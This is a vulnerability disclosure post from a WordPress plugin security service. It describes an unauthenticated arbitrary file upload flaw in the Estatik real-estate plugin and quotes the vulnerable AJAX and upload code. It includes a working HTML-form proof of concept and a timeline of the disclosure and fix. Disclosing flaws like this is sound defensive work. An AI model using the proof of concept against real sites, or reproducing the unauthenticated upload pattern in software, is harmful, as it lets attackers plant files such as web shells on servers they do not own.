Login

Plugin Vulnerabilities

A service to protect your site against vulnerabilities in WordPress plugins.

Login
01 Aug

Arbitrary File Upload Vulnerability in Estatik

As we continue to review old third-party data on hacking attempts to identity more vulnerabilities that hackers have likely already discovered in WordPress plugins we spotted an arbitrary file upload vulnerability in the plugin Estatik.

Back in June of last year a request was made for the file /wp-content/plugins/estatik/front_templates/css/es_front_responsive.css, for what was likely a probe for usage of the plugin before exploiting it. Looking over that plugin for any obvious issues we found that in the current version of it, 2.2.5, a file upload capability is accessible without being logged, despite only being intended to be accessed by users logged in as Administrators.

The issue starts with the function es_prop_media_images() being made accessible through WordPress AJAX functionality to those not logged in (in the file /admin_template/es_property/es_property_functions.php):

231

add_action('wp_ajax_nopriv_es_prop_media_images', 'es_prop_media_images');

In that function the following code saves an uploaded file sent with a request to the AJAX function

131
132
133
134
135
136
137

$image_name = time()."_".$_FILES['es_media_images']['name'][$i];
 
$sourcePath = $_FILES['es_media_images']['tmp_name'][$i];  
 
$targetPath = $upload_dir['path']."/".$image_name;
 
move_uploaded_file($sourcePath,$targetPath) ;

Proof of Concept

The following proof of concept will upload the selected  file and put it in the current month’s directory inside of the /wp-content/uploads/ directory. The name of the file in the upload directory with be the time the file was saved as output by the function time() followed by a “_” and then name of the as it was uploaded.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" /> 
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 7/25/2016 – Developer notified.
  • 8/1/2016 – WordPress.org Plugin Directory notified.
  • 8/1/2016 – WordPres.org Plugin Directory removes plugin.
  • Week of 8/14/2016 – Version 2.3.0 released, which fixes vulnerability, but leaves a lesser vulnerability.

Related posts:

  1. Authenticated Arbitrary File Upload Vulnerability in Estatik
  2. Arbitrary File Upload Vulnerability in Adblock Blocker
  3. Arbitrary File Upload Vulnerability in Vertical SlideShow
  4. Arbitrary File Upload Vulnerability in Attachment Manager

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

One thought on “Arbitrary File Upload Vulnerability in Estatik

  1. Pingback: August 2016 WordPress Core, Plugins & Themes Vulnerabilities

Leave a Reply

Your email address will not be published. Required fields are marked *